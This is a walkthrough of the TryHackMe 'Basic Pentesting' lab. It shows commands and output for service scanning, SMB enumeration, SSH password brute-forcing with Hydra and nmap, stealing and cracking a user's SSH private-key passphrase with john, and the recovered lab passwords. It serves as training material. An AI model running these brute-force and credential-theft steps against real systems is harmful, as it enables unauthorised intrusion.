Home

Basic Pentesting

Date: 09, March, 2021

Author: Dhilip Sanjay S

Click Here to go to the TryHackMe room.

Learning Objectives

  • In these set of tasks you'll learn the following:

    • brute forcing (Hydra, Gobuster)

    • hash cracking (JohnTheRipper)

    • service enumeration (enum4linux)

    • Linux Enumeration (Linpeas)

Solutions

Find the services exposed by the machine

Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 21:26 IST
Nmap scan report for 10.10.21.87
Host is up (0.17s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.07 seconds

What is the name of the hidden directory on the web server?

  • Answer: development

  • Steps to Reproduce:

gobuster dir -u http://10.10.21.87 -t 100 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.21.87
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/03/09 21:33:48 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/development (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2021/03/09 21:33:57 Finished
===============================================================

User brute-forcing to find the username & password

  1. Running Enum4Linux - To enumerate SMB

enum4linux -a 10.10.21.87
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Mar  9 22:26:17 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.21.87
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 =================================================== 
|    Enumerating Workgroup/Domain on 10.10.21.87    |
 =================================================== 
[+] Got domain/workgroup name: WORKGROUP

 =========================================== 
|    Nbtstat Information for 10.10.21.87    |
 =========================================== 
Looking up status of 10.10.21.87
	BASIC2          <00> -         B <ACTIVE>  Workstation Service
	BASIC2          <03> -         B <ACTIVE>  Messenger Service
	BASIC2          <20> -         B <ACTIVE>  File Server Service
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

	MAC Address = 00-00-00-00-00-00

 ==================================== 
|    Session Check on 10.10.21.87    |
 ==================================== 
[+] Server 10.10.21.87 allows sessions using username '', password ''

 ========================================== 
|    Getting domain SID for 10.10.21.87    |
 ========================================== 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Cant determine if host is part of domain or part of a workgroup

 ===================================== 
|    OS information on 10.10.21.87    |
 ===================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.21.87 from smbclient: 
[+] Got OS info for 10.10.21.87 from srvinfo:
	BASIC2         Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
	platform_id     :	500
	os version      :	6.1
	server type     :	0x809a03

 ============================ 
|    Users on 10.10.21.87    |
 ============================ 
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 ======================================== 
|    Share Enumeration on 10.10.21.87    |
 ======================================== 

	Sharename       Type      Comment
	---------       ----      -------
	Anonymous       Disk      
	IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.21.87
//10.10.21.87/Anonymous	Mapping: OK, Listing: OK
//10.10.21.87/IPC$	[E] Cant understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 =================================================== 
|    Password Policy Information for 10.10.21.87    |
 =================================================== 


[+] Attaching to 10.10.21.87 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

	[+] BASIC2
	[+] Builtin

[+] Password Info for Domain: BASIC2

	[+] Minimum password length: 5
	[+] Password history length: None
	[+] Maximum password age: 37 days 6 hours 21 minutes 
	[+] Password Complexity Flags: 000000

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0

	[+] Minimum password age: None
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: 37 days 6 hours 21 minutes 


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 ============================= 
|    Groups on 10.10.21.87    |
 ============================= 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ====================================================================== 
|    Users on 10.10.21.87 via RID cycling (RIDS: 500-550,1000-1050)    |
 ====================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2853212168-2008227510-3551253869
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-500 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-502 *unknown*\*unknown* (8)
..
S-1-5-21-2853212168-2008227510-3551253869-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
..
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
..
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

 ============================================ 
|    Getting printer info for 10.10.21.87    |
 ============================================ 
No printers returned.

  • We find two user names - jan and kay.

  • Now we'll try to bruteforce the password of jan.

  • Because, in the /development directory, we had a text file in which K (refers to kay) mentioned that the password of J (refers to jan) was easily crackable.

  1. HYDRA:

    • Using Hydra to bruteforce the username and password

    • Example: hydra -L users.txt -P passwords.txt ssh://$ip -t 4

    • Options used and their explanations:

      • L flag - specifies a list of login names as file

      • l flag - login name

      • P flag - specifies a list of passwords

      • ssh://$ip - our target and protocol

      • t flag - number of parallel tasks to run

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.21.87 -t 4 | tee hydra.out
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-09 22:14:13
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://10.10.21.87:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344355 to do in 5433:29h, 4 active
[STATUS] 28.00 tries/min, 84 tries in 00:03h, 14344315 to do in 8538:17h, 4 active
[STATUS] 29.14 tries/min, 204 tries in 00:07h, 14344195 to do in 8203:23h, 4 active
[STATUS] 28.07 tries/min, 421 tries in 00:15h, 14343978 to do in 8517:49h, 4 active
[22][ssh] host: 10.10.21.87   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-09 22:43:05

  1. Nmap NSE SSH-brute was faster than hydra.

nmap 10.10.21.87 -p 22 --script ssh-brute --script-args userdb=user.txt,passdb=/usr/share/wordlists/rockyou.txt | tee ssh-brute.out

Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 22:22 IST
NSE: [ssh-brute] Trying username/password pair: jan:jan
..
Nmap scan report for 10.10.21.87
Host is up (0.17s latency).

PORT   STATE SERVICE
22/tcp open  ssh
| ssh-brute: 
|   Accounts: 
|     jan:armando - Valid credentials
|_  Statistics: Performed 781 guesses in 636 seconds, average tps: 1.7

Nmap done: 1 IP address (1 host up) scanned in 665.56 seconds

  1. You can also use msfconsole to bruteforce the credentials.

  • We found jan's password:armando.

What is the username?

  • Answer: jan

What is the password?

  • Answer: armando

What service do you use to access the server(answer in abbreviation in all caps)?

  • Answer: SSH

Enumerate the machine to find any vectors for privilege escalation

  • We could find that there is a password backup file in kay's directory - pass.bak. But it has no read permission.

  • So, we'll try to run linpeas.sh to find possible vectors for priv esc.

  • wget linpeas.sh into any folder where you have the write permission.

jan@basic2:$ ./linpeas.sh
...
[+] Searching ssl/ssh files
Port 22
PermitRootLogin prohibit-password
PubkeyAuthentication yes
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
Possible private SSH keys were found!
/home/kay/.ssh/id_rsa
 --> /etc/hosts.allow file found, read the rules:
/etc/hosts.allow
...

jan@basic2:/home/kay/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
.
.
.
-----END RSA PRIVATE KEY-----

  • After running, we find that the SSH private key (id_rsa) of Kay has read permissions.

  • Copy the contents of the id_rsa file. (Private Key) and store it in your local machine.

  • Try to login using the private key.

    • ssh -i flag - used for identity file.

root@kali: ssh -i kay_id_rsa kay@10.10.21.87
Enter passphrase for key 'kay_id_rsa':

  • It's asking for a password. But, we don't have it yet.

What is the name of the other user you found(all lower case)?

  • Answer: kay

If you have found another user, what can you do with this information?

  • Answer: We can try to escalate our privileges to gain root access. May be that user can have additional permissions which can be exploited to gain root access.

What is the final password you obtain?

  • Answer: heresareallystrongpasswordthatfollowsthepasswordpolicy$$

  • Steps to Reproduce:

  • Now, we'll try to brute force the ssh passphrase using john.

  • Convert the id_rsa file using ssh2john.py so that it can be fed to John for bruteforcing the passphrase.

root@kali: usr/share/john/ssh2john.py kay_id_rsa > forjohn.txt
rrot@kali:john forjohn.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (kay_id_rsa)
Session completed

  • Login using the the ssh private key and provide the passphrase.

root@kali: ssh -i kay_id_rsa kay@10.10.21.87
Enter passphrase for key 'kay_id_rsa': 
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

References

PreviousSearchlight - IMINTNextCrack the Hash

Last updated